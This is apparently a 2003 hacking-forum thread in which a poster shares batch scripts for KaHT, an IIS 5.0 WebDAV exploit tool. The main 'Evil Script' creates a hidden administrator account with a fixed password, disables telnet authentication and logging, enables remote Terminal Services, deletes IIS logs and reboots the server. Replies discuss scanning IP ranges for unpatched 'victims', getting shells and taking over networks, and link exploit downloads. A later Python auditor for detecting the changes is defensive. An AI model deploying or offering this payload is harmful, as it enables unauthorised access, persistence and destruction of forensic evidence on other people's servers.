Nikscap
I wrote a few example scripts named " requests.txt " you can use with Khat.exe ( automated Hack and Discovery tool for WebDav IIS 5.0 Exploit ! )

I tested this against VMware 4.0 server with W2K FR SP3 ( Works Fine ! )


[1] - EVIL SCRIPT

Description of the Evil Script :

01 - Create user TsInternetUser
02 - Set password JuSt4TeSt for this user
03 - Add the user to the administrator group ( UK/US/FR/DE )
04 - Disable NTLM authentication so that anyone is authorized to connect
05 - Disable Telnet connection event logging
06 - Set the Netstart services to start in automatic mode
07 - Enable Terminal Services to start
08 - Disable WebDAV functionality
09 - Write all the settings to the Registry
10 - Write the file for installing the TS components
11 - Launch a quiet install with Sysocmgr.exe
12 - Stop the w3svc service
13 - Delete IIS logfiles
14 - Delete temp files created by the script
15 - Reboot the server to enable the modifications
16 - Exit command to attack another target

CODE
net user TsInternetUser /add
net user TsInternetUser JuSt4TeSt
net localgroup Administrators TsInternetUser /add
net localgroup Administrateurs TsInternetUser /add
net localgroup Administratoren TsInternetUser /add
ECHO Windows Registry Editor Version 5.00>>c:\TEST.REG
ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer.0]>>c:\TEST.REG
ECHO "NTLM"=dword:00000000>>c:\TEST.REG
ECHO "EventLoggingEnabled"=dword:00000000>>c:\TEST.REG
ECHO "LogNonAdminAttempts"=dword:00000000>>c:\TEST.REG
ECHO "LogAdminAttempts"=dword:00000000>>c:\TEST.REG
ECHO "LogFailures"=dword:00000000>>c:\TEST.REG
ECHO "LogToFile"=dword:00000000>>c:\TEST.REG
ECHO [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TlntSvr]>>c:\TEST.REG
ECHO "Start"=dword:00000002>>c:\TEST.REG
ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]>>c:\TEST.REG
ECHO "Start"=dword:00000002>>c:\TEST.REG
ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]>>c:\TEST.REG
ECHO "EnableAdminTSRemote"=dword:00000001>>c:\TEST.REG
ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>c:\TEST.REG
ECHO "TSEnabled"=dword:00000001>>c:\TEST.REG
ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD]>>c:\TEST.REG
ECHO "Start"=dword:00000002>>c:\TEST.REG
ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters]>>c:\TEST.REG
ECHO "DisableWebDAV"=dword:00000001>>c:\TEST.REG
REGEDIT /S C:\TEST.REG
ECHO [Components] > c:\bootlog~.txt
ECHO TSEnabled = on >> c:\bootlog~.txt
sysocmgr /i:%windir%\inf\sysoc.inf /u:c:\bootlog~.txt /q
net stop w3svc
DEL %WINDIR%\system32\logfiles\*.*/S /F /Q
DEL /Q c:\TEST.REG
DEL /Q c:\bootlog~.txt
IISRESET /REBOOT /timeout:00
EXIT


[2] - MEDIC SCRIPT

This script disables only the WebDAV functionality. How to disable WebDAV:

CODE
REM Write a .reg file that turns WebDAV off in IIS 5.0, then import it silently
ECHO Windows Registry Editor Version 5.00>c:\TEST.REG
ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters]>>c:\TEST.REG
ECHO "DisableWebDAV"=dword:00000001>>c:\TEST.REG
REGEDIT /S C:\TEST.REG
DEL /Q C:\TEST.REG
REM Restart IIS (here via reboot) so the new setting takes effect
IISRESET /REBOOT /timeout:00
EXIT


[3] - MEDIC SCRIPT ² ( if you are sure the outgoing FTP port is authorized )

You can patch the vulnerability with this tool, but first you must download the patch from Microsoft ( HERE ) and put the .exe on an FTP server.

CODE
REM Build the ftp script; the space before ">" keeps "21>" from being parsed as a redirect of handle 1
ECHO OPEN www.exemple.com 21 >c:\FTP.TXT
ECHO MyLogin>>c:\FTP.TXT
ECHO MyPassword>>c:\FTP.TXT
REM Binary mode, otherwise the ASCII default corrupts the .exe
ECHO BINARY>>c:\FTP.TXT
ECHO GET Q815021_W2K_sp4_x86_EN.EXE C:\Q815021_W2K_sp4_x86_EN.EXE>>c:\FTP.TXT
ECHO DISCONNECT>>c:\FTP.TXT
ECHO QUIT>>c:\FTP.TXT
FTP -s:C:\FTP.TXT
REM Install the Microsoft patch quietly without a restart prompt, then clean up and reboot
C:\Q815021_W2K_sp4_x86_EN.EXE /N /Q /Z
DEL /Q C:\FTP.TXT
DEL /Q C:\Q815021_W2K_sp4_x86_EN.EXE
IISRESET /REBOOT /timeout:00
EXIT
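From the defender's side, the useful thing to know about the first script is what it leaves behind in the registry. The following is an added example, not code from the post or from KaHT: a Python script that parses REGEDIT5-style .reg text (the format the ECHO lines above produce) and reports the telnet, terminal-service and WebDAV settings the script changes, so the same checks can be run over a .reg export from a server. The sample input is constructed; the telnet key is written out as it appears on Windows 2000, since the post's copy shows it truncated.

```python
"""Added example (not from the post or from KaHT): audit a REGEDIT5-style
.reg text for the telnet, terminal-service and WebDAV settings the batch
script above changes. The sample input below is constructed."""
import re
from typing import Dict, List, Optional, Union

RegValue = Union[int, str]
RegTree = Dict[str, Dict[str, RegValue]]

KEY_RE = re.compile(r"^\[(.+)\]$")
DWORD_RE = re.compile(r'^"([^"]+)"=dword:([0-9A-Fa-f]{1,8})$')
STRING_RE = re.compile(r'^"([^"]+)"="(.*)"$')

# Key paths from the script in the post, upper-cased because registry key
# names are case-insensitive. The telnet key is given as it appears on
# Windows 2000 (the post's copy shows it truncated).
TELNET_PREFIX = r"HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\TELNETSERVER"
TELNET_LOG_VALUES = ("EventLoggingEnabled", "LogNonAdminAttempts",
                     "LogAdminAttempts", "LogFailures", "LogToFile")
REMOTE_ACCESS_SERVICES = ("TLNTSVR", "TERMSERVICE", "TERMDD")
TS_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CURRENTCONTROLSET\CONTROL\TERMINAL SERVER"
W3SVC_PARAMS = r"HKEY_LOCAL_MACHINE\SYSTEM\CURRENTCONTROLSET\SERVICES\W3SVC\PARAMETERS"
SERVICE_AUTO_START = 2  # Start: 2 = automatic, 3 = manual, 4 = disabled


def parse_reg(text: str) -> RegTree:
    """Parse [key] sections with "name"=dword:hex or "name"="string" lines
    into {KEY: {name: value}}; the header line and ; comments are skipped."""
    tree: RegTree = {}
    current: Optional[str] = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Windows Registry Editor") or line.startswith(";"):
            continue
        key = KEY_RE.match(line)
        if key:
            current = key.group(1).upper()
            tree.setdefault(current, {})
            continue
        if current is None:
            continue  # value line before any [key] section: invalid, ignore
        dword = DWORD_RE.match(line)
        if dword:
            tree[current][dword.group(1)] = int(dword.group(2), 16)
            continue
        string = STRING_RE.match(line)
        if string:
            tree[current][string.group(1)] = string.group(2)
    return tree


def audit_reg(tree: RegTree) -> List[str]:
    """Return one finding per setting that matches what the script sets."""
    findings: List[str] = []
    for key, values in tree.items():
        if key.startswith(TELNET_PREFIX):
            if values.get("NTLM") == 0:
                findings.append("telnet: NTLM authentication disabled")
            off = [name for name in TELNET_LOG_VALUES if values.get(name) == 0]
            if off:
                findings.append("telnet: logging disabled (" + ", ".join(off) + ")")
        service = key.rsplit("\\", 1)[-1]
        if "\\SERVICES\\" in key and service in REMOTE_ACCESS_SERVICES:
            if values.get("Start") == SERVICE_AUTO_START:
                findings.append(f"service {service}: set to auto-start")
        if key == TS_KEY and values.get("TSEnabled") == 1:
            findings.append("terminal server: enabled")
    # The one hardening setting in the script; its absence is itself a finding
    if tree.get(W3SVC_PARAMS, {}).get("DisableWebDAV") == 1:
        findings.append("iis: WebDAV disabled (hardening present)")
    else:
        findings.append("iis: WebDAV not disabled")
    return findings


# Constructed sample: the text the post's ECHO lines would produce
SAMPLE_REG = r"""Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0]
"NTLM"=dword:00000000
"EventLoggingEnabled"=dword:00000000
"LogFailures"=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TlntSvr]
"Start"=dword:00000002
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
"Start"=dword:00000002
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"TSEnabled"=dword:00000001
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters]
"DisableWebDAV"=dword:00000001
"""

if __name__ == "__main__":
    for finding in audit_reg(parse_reg(SAMPLE_REG)):
        print(finding)
```

The service check keys off the last path component, so it matches both ControlSet001 and CurrentControlSet, which the script mixes. A .reg export taken with `regedit /e` from the same keys can be fed to parse_reg unchanged.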
ComSec
Nikscap thanks for this script mate ... can you put any more like this in the exploit section....

many thanks

p.s. nice script, wicked
GSecur
Great script Nikscap, doing a nice job here keep up the great coding.
Gumpy54
Hmm. Call me a n00b if ya like, but how does this script run? Remote?
Onlyone
Where can I download the Khat.exe?
GSecur
It's actually kaht.exe, small typo

Read all about it. http://www.lurhq.com/webdav.html
GSecur
Just added KaHT.exe to the downloads section.
http://www.governmentsecurity.org/forum/in...t=ST&f=19&t=453
LilJon
Has anybody been able to successfully get on a box with this exploit? Because my progs keep saying every single thing is patched.
Any replies would help
SyN/AcK
QUOTE (LilJon @ Jun 25 2003, 04:19 PM)
Has anybody been able to successfully get on a box with this exploit? Because my progs keep saying every single thing is patched.
Any replies would help

I've had this same exact problem.
The Doom Master
Mate, great script, just one question: after disabling the WebDav ...
what version of IIS is it and do I hack with the same programs as b4?
--Elite--
The latest WebDav vulnerability ( third version, as far as I know ) has been fixed
completely with SP4. It makes it a bit hard to find victims.
Hey, don't worry! There are soooooooooo many lazy admins out there!!!

And who knows? It's MICROSOFT!!! Always offering you new things...
some times bad things, some times good things and some times fantastic
things
Steffan
Very old, and the script was posted more than half a year ago on coromputer...

Try to find new stuff, not such old lame junk !!

C'ya
Steven..
SyN/AcK
QUOTE (Steffan @ Jan 24 2004, 11:30 AM)
Very old, and the script was posted more than half a year ago on coromputer...

Try to find new stuff, not such old lame junk !!

C'ya
Steven..

Well, it's not lame if you have a target that is not patched, of which I have several. Unfortunately, the exploit still does not work.
Yahiko Yagami
Very nice script, thanks. About the kaht.exe exploit, I've been trying it the last 2 days and it works, but I only got a shell on about 2% of targets (actually, with wb.exe I got no shells, so I think it's better).
zero-maitimax
maybe it's me but it doesn't work
I scanned this range 200.129.8.1 - 218.8.9.254

but nothing to find. I think this exploit is dead..
Krogoth
great job, Nikscap. gotta love your script and coding skills
TheOther
This exploit is dead! It's too old.

dongfangshuo
though this hole is old, I can use it on any shell I have got.
so it is perfect, thx
jpno5
I still get results when I use it internally. Once I've got a shell I wait until 2 in the morning and run it on their desktop; I've seen myself taking over a whole network with it. I'm not sure why it works better internally than remotely; I think it may be because their router blocks port 135 externally.
realloader
I have tried to get command on webdav.
There are a lot of tools I downloaded, but none of them work.
Is there a good tool which I can use to get command?
Pl. help!
Gangster*
Thanks for the post!

I can't seem to be able to get these things to work. Maybe I am doing something wrong.

Thanks again
DvilleStoner
I would like to see more sploits built like this.
PL3X59
very nice script
uuuuuuuuuseeeeeeeeful

good job man
I'll try your commands

maybe I can use them for other things
So GoOoD So GooOooD

plex

sorry for my French English :-p
toste
something weird happened, I have this error: host connects to my listening NC, but then no data is sent and it times out. how to fix this?
Hawk12
thx for the nice script
D3ADLiN3
thanks for the great script, now to put it to use
mnk
how do I use it

I am kinda new in this shit
TedOb1
if you guys can't find vulnerable boxes you're not checking your logs :]
droppunx
This is very nicely made, however would have been nice to see this 6 months back when I was working with WebDav everyday; seems to be a dead sploit now, SP4 fixed most vulnerabilities...
EzMe

Find kaht here : http://www.securityfocus.com/data/vulnerab...loits/kaht2.zip
canardwc
great job, was just working on such a thing, lol working ... (1/2 hour)

thx